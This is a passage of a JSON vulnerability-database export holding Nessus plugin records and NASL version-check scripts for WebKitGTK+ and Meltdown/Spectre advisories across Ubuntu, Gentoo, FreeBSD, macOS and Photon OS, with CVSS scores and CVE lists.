or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.6-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.6-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:43:46", "description": "The remote host is affected by the 
vulnerability described in GLSA-201803-11 (WebKitGTK+: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details.\n Impact :\n\n An attacker could execute arbitrary commands via maliciously crafted web content.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-22T00:00:00", "type": "nessus", "title": "GLSA-201803-11 : WebKitGTK+: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201803-11.NASL", "href": "https://www.tenable.com/plugins/nessus/108526", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-11.\n#\n# The advisory text is 
Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108526);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_xref(name:\"GLSA\", value:\"201803-11\");\n\n script_name(english:\"GLSA-201803-11 : WebKitGTK+: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-11\n(WebKitGTK+: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. 
Please\n review the referenced CVE identifiers for details.\n \nImpact :\n\n An attacker could execute arbitrary commands via maliciously crafted web\n content.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.18.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.18.6\"), vulnerable:make_list(\"lt 2.18.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:51:50", "description": "The remote host is running a version of macOS that is 10.13.x prior to 10.13.2. 
It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-10T00:00:00", "type": "nessus", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-13826", "CVE-2017-13833", "CVE-2017-13844", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-9798"], "modified": 
"2019-04-10T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700513.PRM", "href": "https://www.tenable.com/plugins/nnm/700513", "sourceData": "Binary data 700513.prm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:32", "description": "The WebKit team reports many vulnerabilities.\n\nPlease reference the CVE/URL list for details.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13783", "CVE-2017-13784", "CVE-2017-13785", "CVE-2017-13788", "CVE-2017-13791", "CVE-2017-13792", "CVE-2017-13794", "CVE-2017-13795", "CVE-2017-13796", "CVE-2017-13798", "CVE-2017-13802", "CVE-2017-13803", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-7087", "CVE-2017-7089", "CVE-2017-7090", "CVE-2017-7091", "CVE-2017-7092", "CVE-2017-7093", "CVE-2017-7095", 
"CVE-2017-7096", "CVE-2017-7098", "CVE-2017-7100", "CVE-2017-7102", "CVE-2017-7104", "CVE-2017-7107", "CVE-2017-7109", "CVE-2017-7111", "CVE-2017-7117", "CVE-2017-7120", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-07-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_1CE95BC7327811E8B52700012E582166.NASL", "href": "https://www.tenable.com/plugins/nessus/108703", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108703);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/10 16:04:13\");\n\n script_cve_id(\"CVE-2017-13783\", \"CVE-2017-13784\", \"CVE-2017-13785\", \"CVE-2017-13788\", \"CVE-2017-13791\", \"CVE-2017-13792\", \"CVE-2017-13794\", \"CVE-2017-13795\", \"CVE-2017-13796\", \"CVE-2017-13798\", \"CVE-2017-13802\", \"CVE-2017-13803\", \"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2017-7087\", \"CVE-2017-7089\", \"CVE-2017-7090\", \"CVE-2017-7091\", \"CVE-2017-7092\", \"CVE-2017-7093\", \"CVE-2017-7095\", \"CVE-2017-7096\", \"CVE-2017-7098\", \"CVE-2017-7100\", \"CVE-2017-7102\", \"CVE-2017-7104\", \"CVE-2017-7107\", \"CVE-2017-7109\", \"CVE-2017-7111\", \"CVE-2017-7117\", \"CVE-2017-7120\", \"CVE-2017-7153\", \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"The WebKit team reports many vulnerabilities.\n\nPlease reference the CVE/URL list for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0002.html\"\n );\n # https://vuxml.freebsd.org/freebsd/1ce95bc7-3278-11e8-b527-00012e582166.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2cac8e99\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/18\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3>=2.16.6<2.20.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-30T14:53:28", "description": "An update of [linux] packages for PhotonOS has been released. 
This kernel update fixes vulnerability CVE-2017-5754 which is commonly known as Meltdown vulnerability.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Photon OS 2.0 : linux (PhotonOS-PHSA-2018-2.0-0010) (Meltdown) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/111280", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0010. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111280);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_bugtraq_id(102378);\n\n script_name(english:\"Photon OS 2.0 : linux (PhotonOS-PHSA-2018-2.0-0010) (Meltdown) (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [linux] packages for PhotonOS has been released. This\nkernel update fixes vulnerability CVE-2017-5754 which is commonly known as\nMeltdown vulnerability.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-10\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ae01943\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.9.75-1.ph2\",\n \"linux-debuginfo-4.9.75-1.ph2\",\n \"linux-devel-4.9.75-1.ph2\",\n \"linux-docs-4.9.75-1.ph2\",\n \"linux-drivers-gpu-4.9.75-1.ph2\",\n \"linux-esx-4.9.75-1.ph2\",\n \"linux-esx-debuginfo-4.9.75-1.ph2\",\n \"linux-esx-devel-4.9.75-1.ph2\",\n \"linux-esx-docs-4.9.75-1.ph2\",\n \"linux-oprofile-4.9.75-1.ph2\",\n \"linux-secure-4.9.75-1.ph2\",\n \"linux-secure-debuginfo-4.9.75-1.ph2\",\n \"linux-secure-devel-4.9.75-1.ph2\",\n \"linux-secure-docs-4.9.75-1.ph2\",\n \"linux-secure-lkcm-4.9.75-1.ph2\",\n \"linux-sound-4.9.75-1.ph2\",\n \"linux-tools-4.9.75-1.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : 
SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:54:46", "description": "An update of the linux package has been released.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0097", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0097_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121797", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0097. 
